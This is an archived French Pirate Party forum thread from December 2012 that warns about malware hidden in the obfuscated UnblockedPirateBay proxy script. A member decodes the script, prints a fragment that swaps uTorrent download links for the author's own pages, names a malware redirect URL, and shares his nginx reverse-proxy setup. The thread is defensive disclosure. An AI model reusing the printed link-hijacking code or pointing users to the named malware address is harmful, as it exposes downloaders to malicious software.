Bienvenue sur les archives forum du Parti Pirate


Le Parti Pirate refond complètement son forum et a migré vers un outil plus moderne et performant, Discourse !
Retrouvez nous ici : https://discourse.partipirate.org

Alerte aux Malwares dans UnblockedPirateBay

Avatar de l’utilisateur
Mistral
Membre AFPP
Messages : 1027
Inscription : mar. 10 avr. 2012, 23:06

Alerte aux Malwares dans UnblockedPirateBay

Messagepar Mistral » dim. 30 déc. 2012, 23:20

Comme vous savez, cela fait quelques jours/semaines que les proxy vers The Pirate Bay fleurissent.

Moi-même bien que me devant de ne pas ignorer la chose, j'avoue ne pas être adepte de ce site pour diverses raisons mais estime illégitime de lutter contre via la censure. Aussi, je me suis intéressé aux projets de proxy. De plus en tant que secrétaire national, j'ai une responsabilité pénale et morale dans cette affaire et c'est donc naturellement qu'avant la mise en production du projet qui devait utiliser UnblockedPirateBay à l'origine (nous en étions à choisir la taille du logo et placer les mentions légales), que j'ai été surpris par plusieurs aspects dans le code source de UnblockedPirateBay.

UnblockedPirateBay : des étrangetés

- Tout d'abord le code source est encodé (ce qui fait qu'il n'est pas lisible facilement : cela se nomme de l'obfuscation), c'est un comportement qu'on retrouve généralement dans les logiciels propriétaires, pas tellement chez les "pirates". D'autant que l'auteur se justifie en disant que le script sera plus rapide ainsi (ce qui est faux). Voir le fichier "Readme" : << ... encoded firstly for speed, secondly as I've spent a lot of time on here ironing out as many bugs as I can to keep the functionality and speed of the script as fast as possible. >> .
- Le bas de page comporte plusieurs différences avec le site original de thepiratebay.se
- L'auteur du proxy ne se fait connaitre à aucun endroit sur son site et même appel à faire des donations aux Parti Pirates plutôt qu'à lui même (trop gentil pour être totalement désintéressé : les cout serveurs pour son sites justifieraient au moins quelques remboursements).
- Sur un ou deux endroits, il semble que le travail ait été baclé et il est dit que ça sera fait plus tard (pourtant ça n'est pas bien compliqué et certaines fonctionnalités sont faites avec la rigueur requise, alors pourquoi ?)
- Enfin, dans un esprit d'opensource, de libre enfin de partage (c'est The Pirate Bay tout de même !), il est surprenant de ne pas avoir forké un projet libre ou même en avoir juste fait la promotion (par exemple cet outil est très générique : phproxy et il y en a quelques autres).


J'ai donc décodé le code source pour être un peu plus sur de ce que nous allions mettre en production[1]. Et là j'ai vu encore d'autres choses. Et avec un esprit un peu pervers. En effet, une fois le code lisible, on peut lire des commentaires (lorsqu'on programme, on ajoute des lignes de texte ligne pour expliquer ce que l'on fait au dessous) pas très cohérent avec ce qui est réalisé et, plus, on peut lire un commentaire qui ajoute de nouvelles raison au fait que ce soit encodé (pour éviter que l'on retire son nom), qui nous autorise à le faire (parce qu'on est doué ?) et qui nous dit en plus qu'il y a des appels qui sont fait entre le script et le site UnblockedPirateBay (pour plein de bonnes intentions). Voir le texte en anglais, dessous [2].

Cela devient encore plus louche.

UnblockedPirateBay : les malware qu'il contient

Du coup j'ai regardé ce que faisait le code.

  • Il remplace les liens vers le site de utorrent vers des sites de malware[3] [4], il fait aussi d'autres remplacement de ce type mais j'ai pas pu tout analyser.
  • Il utilise le code qui s'échange entre son site, UnblockedPirateBay, et le script pour injecter du code javascript (ce n'est pas directement dangereux, mais ça pourrait le devenir)
  • Il remplace certaines publicités de TPB par les siennes (à noter néanmoins qu'il nous invite à le faire nous aussi dans le fichier "readme")


Dans tous les cas, il est certain qu'en propageant son programme chez beaucoup de monde, il espère récupérer de l'argent via des revenus détournés. La force réside malheureusement sur la crédulité du public sur internet. Les intentions affichées semblent aller dans le sens que nous aimerions et l'on a tendance à croire que son prochain cherche systématiquement à nous être sympathique. Ce n'est pas toujours le cas.


Ma conclusion personnelle

Aucun projet ne prend 5 minutes à être réalisé.

Le proxy http://tpb.partipirate.org qui a commencé à être annoncé hier (et qui est en travail depuis plus d'une semaine) a finalement été fait directement via un reverse proxy sur nginx. Cela prend quelques lignes et ici le proxy est fait sans recompilation des sources de nginx [5] (n'étant pas utilisateur de TPB, je n'ais pu tester que les fonctionnalités principales). C'est une action très positive et il faut aussi que nous soyons capable de faire du buzz sur des actions pragmatique et légitime. Néanmoins, d'un point de vu idéologique, je trouve dommage de ne pas avoir envisagé la question sous un angle plus global et de créer proxy plus générique. Un proxy pouvant servir de relais pour tous les sites censurés à travers le monde (dont le contenu peut-être plus "politique" que TPB). Ceci avec phproxy, un VPN ou même un serveur proxy anonyme. Néanmoins là aussi il faudra du travail pour étudier la légalité, la technique et les contraintes associés (ban d'ip, NDD, surcharge, ...).

Quoiqu'il en soit il y a toujours des risques à se lever de son lit et il faut juste savoir pour quoi nous nous le faisons. De plus, une action militante, comme un proxy vers TPB ne doit pas nous détourner du sérieux qui est le notre au sein du Parti Pirate et avant de faire ce type d'action, nous devrions continuer de prendre le temps de le faire avec soin. C'est le cas pour la plupart de nos actions et c'est ce qui fait notre force et nous apportera des résultats par la suite. De plus, il faut toujours garder les yeux ouverts et d'ailleurs je vous invite à vérifier ce que je viens de vous dire en téléchargeant les sources d'origine du projet et d'en observer les sources (quand bien même je ne serai pas malveillant, je peux être faillible). Si vous avez quelques maigres notions de PHP, vous n'aurez aucun mal (le code est très basique).

Dans l'hypothèse où les sources seraient modifiées entre temps, j'en ai fait une copie ici mais vous pouvez aussi les prendre sur le site de son auteur unblockedpiratebay.com/external.


Les notes de bas de page

[1] Vous pouvez décoder à l'aider de ce bout de code par exemple :

Code : Tout sélectionner

function decode($str, $iter=0) {
   $iter++;
   $str = str_replace('eval(', 'return(', $str);
   $str = eval($str);
   if($iter < 300 and preg_match('/gzinflate/i', $str)>0) {
      return decode($str, $iter);
   }
   return $str;
}
echo decode("Le code sources de la page du type eval(gzinflate(str_rot13(base64_decode ... ");
//Merci pour votre indulgence sur la qualité de ce code, mon objectif n'était pas là.


[2] Commentaire dans le code, après décodage : << The reason for base64 encoding some stuff is most people, I included, will remove credits etc instantly that dont effect functionality, removing my credit, without worrying whether it effects them.
I would like the credits kept in, but you are more than free to remove them, and just by getting to reading this, you deserve the right to remove them.
You will notice some calls to my server, in the footer etc, these will be used to I can insert an image or text if thepiratebay changes something major and the script stops working, allowing me to inform the site owner, and offer updates. >>

[3] Un malware est un logiciel malveillant. Ce n'est pas nécessairement un virus mais l'objectif est de gagner de l'argent en vous faisant visualiser des publicités ou, d'espionner et éventuellement vous conduire à dépenser de l'argent. Il maîtrise la page qui fait la redirection, actuellement ça pointe sur http*//galleries.blamcity.com/c43ae4a8fa8e0f/c437e3a9f3820e/c6/8429d0ed/c1/ (je ne connais pas ce logiciel mais manifestement c'est pas utorrent ... et je vous invite à ne pas le télécharger (même sans l’exécuter).


[4] Un morceau de code choisi :

Code : Tout sélectionner

//adjust buttons
$rr1 = 'http://bflixdownload.info/';
$rr2 = 'http*//unblockedpiratebay.com/external/download.php';
$toremove = str_replace("$rr1","$rr2", $toremove);

$rr1 = 'http://www.utorrent.com/downloads';
$rr2 = 'http*//unblockedpiratebay.com/external/torrentclient.php';
$toremove = str_replace("$rr1","$rr2", $toremove);
$rr1 = 'http://www.utorrent.com/';
$toremove = str_replace("$rr1","$rr2", $toremove);


[5] La zone nginx sur le serveur du Parti Pirate (mériterai un peu d'optimisation) :

Code : Tout sélectionner

upstream ext-tpb {
  server 194.71.107.80:80;
}
server {
        listen 80;
        server_name tpb.partipirate.org;
      location = /robots.txt {
         echo "User-Agent: * \nDisallow: /";
         break;
      }
        location / {
                proxy_set_header       Host thepiratebay.se;
                proxy_pass             http://ext-tpb;
                proxy_cache            off;
                #proxy_cache_valid      200  0;
                #proxy_cache_use_stale  error timeout invalid_header updating http_500 http_502 http_503 http_504;
                if ( $request_uri !~* \.(gif|jpg|jpeg|png|css|js|txt)$ ) {
                        echo_after_body "<p style='text-align:center;'><b><i>This is a Pirate Bay proxy set up by the <a href='https://www.partipirate.org'>Pirate Party of France</a> to support the Pirate Party of the United Kingdom. We do not host any content. </i><br/>Ceci est un proxy vers The Pirate Bay mis en place par le <a href='https://www.partipirate.org'>Parti Pirate Français</a> en soutien au Parti Pirate UK. Nous n'hébergeons aucun contenu.</b><br/><a href='https://www.partipirate.org/spip.php?article107'>Mentions legales</a></p>";
                }
        }
}
Pièces jointes
theunblockedbayinfo_v1.zip
(111.51 Kio) Téléchargé 58 fois
Mistral, Trésorier Bretagne
Membre SI Diversité
Président de l'association de financement

Avatar de l’utilisateur
Jesse
Secrétaires de la Coordination Nationale
Messages : 148
Inscription : mar. 24 avr. 2012, 11:20

Re: Alerte aux Malwares dans UnblockedPirateBay

Messagepar Jesse » lun. 31 déc. 2012, 01:07

Merci Mistral pour cette découverte, ça mérite qu'on relaie bien l'info et on devrait en profiter pour faire une belle page de wiki puisqu'elle est sortie dans la presse.
Je vous recopie d'un email des choses qui me semblent à rédiger:

Jesse a écrit :• Pour les procédures d’installation : en plus de réécrire dans le wiki la partie php avec un warning sur le spyware, et une autre solution php de repli (http://code.google.com/p/phproxyimproved/ par exemple), on devrait continuer à lister différentes façons de mettre ça en place dans la page du wiki :
o Mistral, c’est ça que tu as fait? http://tumblr.intranation.com/post/7662 ... erse-proxy
o Sinon on doit pouvoir citer ça http://httpd.apache.org/docs/2.2/mod/mod_proxy.html ou ça: http://www.squid-cache.org/
o Et sur plateforme Microsoft il y a également les deux suivants : http://urlrewriter.codeplex.com/, http://asproxy.sourceforge.net/ plus puissants que le reverse proxy natif dont j’ai mis la procédure d’installation (comme celui de Mistral). Je rajouterai une procédure d’installation.
• Mais on devrait surtout en profiter pour dérouler notre discours sur le sujet :
o C’est beaucoup plus intéressant si plein d’anonymes le font, plutôt que le PP, symboliquement sur les maigres ressources de ses serveurs
o Présentation de solutions plus avancées comme Tor ou I2P, les dark nets/ bright nets etc
o Question de la responsabilité vis-à-vis du traffic, dans le cas d’un nœud ouvert, comme par exemple récemment : http://www.zdnet.com/austrian-man-raide ... 000008133/
On pourrait demander au gouvernement de donner ses intentions en la matière.
Jesse
Secrétaire de la Coordination Nationale

Jkh
Messages : 1
Inscription : lun. 31 déc. 2012, 00:40

Re: Alerte aux Malwares dans UnblockedPirateBay

Messagepar Jkh » lun. 31 déc. 2012, 01:12

Bonjour,

Désole, je tombe un peu comme un cheveu sur la soupe, sans présentation, toussa :)

Tout d'abord, tpb à fourni un ip sur lequel on peut se connecter afin d'avoir une version light ; notamment sans login possible. L'ip c'est 194.71.107.80
Cette solution était apparue l'année dernière, quand certains proxy présentaient le même problème.

De mon côté, j'ai un proxy TPB qui tourne depuis un an, calqué sur le modèle cgi-proxy. Il fonctionne bien, et vite, mais nécéssite fast cgi.
J'ai presque rien modifié du cgi-proxy original, à part l'adresse ip précédemment cité, et bayimg.org.

Je l'ai mis ici http://vldiscovery.me/proxy.gz
Dites moi ce que vous en pensez.

Jkh.
Twitter: @pldwan
Website: pld.li

Avatar de l’utilisateur
Vincent Andrès
Loup de mer
Messages : 858
Inscription : sam. 10 mars 2012, 12:50
Contact :

Re: Alerte aux Malwares dans UnblockedPirateBay

Messagepar Vincent Andrès » lun. 31 déc. 2012, 10:17

Jkh a écrit :Bonjour,
De mon côté, j'ai un proxy TPB qui tourne depuis un an, calqué sur le modèle cgi-proxy. Il fonctionne bien, et vite, mais nécéssite fast cgi.
J'ai presque rien modifié du cgi-proxy original, à part l'adresse ip précédemment cité, et bayimg.org.
Je l'ai mis ici http://vldiscovery.me/proxy.gz
Dites moi ce que vous en pensez.

Bonjour,
fast cgi c'est un truc standard, ou c'est spécifique nginx ?
Je demande ça car j'ai casé mon proxy ( via UnblockedPirateBay.com ) sur mutu OVH.

Je préférerais aussi installer un truc plus clean que UnblockedPirateBay.com
... mais mes compétences dépassent hélas pas le niveau mutu OVH. :(

Merci
(et merci à Mistral pour sa grosse analyse)

Avatar de l’utilisateur
Jerome06
Pirate
Messages : 255
Inscription : ven. 02 mars 2012, 12:22
Localisation : PACA - 06
Contact :

Re: Alerte aux Malwares dans UnblockedPirateBay

Messagepar Jerome06 » lun. 31 déc. 2012, 11:49

Vincent Andrès a écrit :
Jkh a écrit :Bonjour,
De mon côté, j'ai un proxy TPB qui tourne depuis un an, calqué sur le modèle cgi-proxy. Il fonctionne bien, et vite, mais nécéssite fast cgi.
J'ai presque rien modifié du cgi-proxy original, à part l'adresse ip précédemment cité, et bayimg.org.
Je l'ai mis ici http://vldiscovery.me/proxy.gz
Dites moi ce que vous en pensez.

Bonjour,
fast cgi c'est un truc standard, ou c'est spécifique nginx ?
Je demande ça car j'ai casé mon proxy ( via UnblockedPirateBay.com ) sur mutu OVH.

Je préférerais aussi installer un truc plus clean que UnblockedPirateBay.com
... mais mes compétences dépassent hélas pas le niveau mutu OVH. :(

Merci
(et merci à Mistral pour sa grosse analyse)


Attention OVH ne veut pas de proxy sur les hébergements mutualisés, tu risque de te faire fermer rapidement.

Sur un dédié par contre ils s'en foutent !

Pour info : C'est a cause de la loi française, sur les mutualisés c'est eux l'hébergeur alors que sur un dédié c'est toi.
Site de la Section PACA du PP
Twitter Parti Pirate PACA
Page Facebook
Page Google+

Soyer le changement que vous souhaitez voir dans le monde. Gandhi

Ma clef PGP publique : http://p-li.fr/clef

Avatar de l’utilisateur
Vincent Andrès
Loup de mer
Messages : 858
Inscription : sam. 10 mars 2012, 12:50
Contact :

Re: Alerte aux Malwares dans UnblockedPirateBay

Messagepar Vincent Andrès » lun. 31 déc. 2012, 12:06

Jerome06 a écrit :Attention OVH ne veut pas de proxy sur les hébergements mutualisés, tu risque de te faire fermer rapidement.
Sur un dédié par contre ils s'en foutent !
Pour info : C'est a cause de la loi française, sur les mutualisés c'est eux l'hébergeur alors que sur un dédié c'est toi.

aie. Bon, merci pour l'info. Je vais voir ce que je peux faire.
Je me tâte pour un hébergeur alternatif ... peut-être le moment de voir de ce coté pour ce genre de trucs.
http://opentruc.fr/wiki/Open_Internet#L ... lternatifs

(Les dédiés ... c'est pas donné.)

Avatar de l’utilisateur
floyd
Vieux loup de mer
Messages : 1757
Inscription : mer. 18 juil. 2007, 00:41
Localisation : Orléans
Contact :

Re: Alerte aux Malwares dans UnblockedPirateBay

Messagepar floyd » lun. 31 déc. 2012, 13:30

Salut à tous,

pour l'histoire des proxys l'important n'est pas que celui-ci soit utilisé, mais qu'il y ait un nombre important de proxys mis en place pour bien démontrer l'absurdité de la censure.

Sinon niveau technique un proxy est très très simple à mettre en place, pour cela divers moyen existent tels qu'utiliser apache ou nginx par exemple en proxy ou encore du code python ou PHP en mode hébergé (derrière un apache ou nginx, encore eux).

Si vous n'avez pas confiance en unblockedpiratebay, ce qui est mon cas à cause du code obfusqué, je vous recommande de regarder du coté des autres solutions, exemple PHP mini proxy http://www.abysscorp.org/project/phpminiproxy dont le code est très facilement modifiable pour pointer directement vers piratebay ou autre site.

Si j'ai le temps dans la journée je le modifies pour remplir la tache que l'on attend de lui.

Pour info, et aller dans le sens de Mistral, les fonctions utilisés dans le code de unblockpiratebay pour désobfusquer le code et en permettre l'interprétation dans PHP ont un cout très important en temps d'exécution et de quantité de mémoire utilisé. Je vous recommenderai de toujours vous méfier de ce type de code, particuliérement lorsque l'on trouve le couple eval( base64_decode( ...));. Il s'agit typiquement du genre de code moisi que l'on retrouve dans certains templates gratuits pour des cms de type drupal, wordpress, ....
Soyez libres.


Revenir vers « archive 2012 »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Bing [Bot] et 1 invité